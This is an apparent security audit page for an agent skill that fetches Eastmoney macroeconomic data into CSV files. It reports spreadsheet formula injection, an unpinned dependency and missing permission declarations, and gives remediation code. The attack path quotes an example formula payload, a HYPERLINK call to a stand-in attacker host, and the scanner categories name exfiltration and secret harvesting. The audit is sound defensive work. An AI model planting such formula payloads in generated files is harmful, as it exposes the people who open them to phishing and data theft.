Back to skill

Security audit

Global Macro Database Assistant

Security checks for vulnerabilities and agentic risk

Overview

This skill appears to do what it says: query Eastmoney macroeconomic data, then save CSV and description files, with some install and CSV-handling cautions.

Install in an isolated Python environment if possible, set EM_API_KEY only for users and sessions that need this service, and treat generated CSV files as untrusted external data when opening them in Excel or similar spreadsheet software. Expect the skill to contact Eastmoney services and to write result files under the configured output directory.

Vulnerability Patterns
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (2)

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/get_data.py:269
Finding

Spreadsheet Formula Injection in Generated CSV Files

Content
View full analysis
str: if v is None: return "" if isinstance(v, (dict, list)): return json.dumps(v, ensure_ascii=False) return str(v) ``` ### Technical Analysis Values returned by the remote macroeconomic-data API are converted to strings and written directly into CSV cells. No validation or neutralization is applied to strings beginning with spreadsheet formula markers such as `=`, `+`, `-`, or `@`. Although CSV is nominally a data format, common spreadsheet applications may interpret cells beginning with these characters as formulas. Consequently, a malicious or compromised API response could place an attacker-controlled formula in a generated file. The formula may be evaluated when the user opens the CSV in a compatible spreadsheet application. The vulnerability crosses a trust boundary because remote response content is treated as safe spreadsheet data without output encoding appropriate to the eventual consumer. ### Attack Path 1. An attacker compromises the upstream API, influences a data source consumed by it, or otherwise causes a table value to contain a spreadsheet formula. 2. The API returns a value such as `=HYPERLINK("https://attacker.example/...","Open")` or another applicat ...[truncated 1337 chars]
Remediation
View remediation
str: text = _flatten_value(value) if text.startswith(("=", "+", "-", "@")): return "'" + text return text ``` 2. Use the function for all cells: ```python writer.writerow({ key: _escape_spreadsheet_value(value) for key, value in row.items() }) ``` 3. Consider handling leading tabs, carriage returns, newlines, and whitespace before a formula marker because spreadsheet behavior varies by product. 4. Add automated tests covering values beginning with `=`, `+`, `-`, and `@`, as well as ordinary negative numbers if preserving their numeric type is important. 5. Document that exported files contain untrusted external data and recommend opening them with external-content and macro execution disabled. 6. If consumers require machine-readable numeric values, consider a safer structured format such as JSON or provide a strict CSV mode that validates values against the expected schema and data types. ]]>

T08 · Insecure Dependencies

Note
Location
SKILL.md:10
Finding

Unpinned Third-Party Dependency Installation

Content
View full analysis
Remediation
View remediation
" ``` 2. Declare dependencies in a standard requirements or lock file rather than relying only on prose installation instructions. 3. Generate and verify cryptographic hashes, for example by using a hash-locked requirements file and installing with: ```bash pip install --require-hashes -r requirements.txt ``` 4. Pin and audit transitive dependencies as well as the direct `httpx` dependency. 5. Install the Skill in an isolated virtual environment instead of the shared user-level Python environment. 6. Use a trusted package index over TLS and explicitly control any additional package-index configuration. 7. Establish a dependency-update process that includes vulnerability scanning, changelog review, compatibility testing, and deliberate lock-file regeneration. ]]>
Vulnerability Patterns
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (3)

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
94% confidence
Finding

The skill declares capabilities that use environment secrets, filesystem writes, and outbound network access, but it does not explicitly constrain tool scope via permissions or allowed-tools metadata. In an agent platform, that mismatch can lead to overbroad execution privileges, making accidental secret exposure, unintended file modification, or unexpected external requests more likely if the skill or surrounding orchestrator is misused.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
89% confidence
Finding

The user-facing title and primary operating instructions are presented in Chinese, and the skill describes interaction via text input without stating that other languages are supported. Under the policy, forcing a specific language without user opt-in is a natural-language policy concern unless a locale constraint is clearly documented and justified.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The module docstring and user-facing behavior describe the skill exclusively in Chinese and state that users can query via text input, but there is no indication that language is optional or configurable. This creates a natural-language policy concern because the skill effectively assumes a fixed language/locale without offering user choice or documenting a justified locale restriction.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.